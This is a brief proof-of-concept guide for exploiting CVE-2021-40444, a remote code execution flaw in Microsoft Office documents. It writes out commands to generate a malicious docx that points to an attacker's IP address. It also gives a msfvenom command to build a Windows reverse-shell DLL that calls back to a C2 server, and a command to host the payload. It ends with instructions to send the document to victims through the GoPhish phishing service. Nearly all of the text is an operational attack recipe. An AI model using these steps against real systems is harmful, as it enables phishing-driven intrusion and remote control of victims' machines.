CVE-2021-40444

PoC Guide

Step 1: Download PoC Resource

PoC Resource

Step 2: Generate malicious document

python3 exploit.py generate test/calc.dll http://<your attacker ip address>

Generate Reverse Shell by using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<C2 Server IP> LPORT=<C2 Server Port> -f dll > word.dll

Pasted image 20240729221817.png

Step 3: Deliver this malicious to victim by using Gophish

Setup the server for delivering cab file to victim who click on docx file

python3 exploit.py host 80

After generate malicious docx, we will use GoPhish (Phishing Mail Service) for delivering this docx to victim.

Demo Video

Title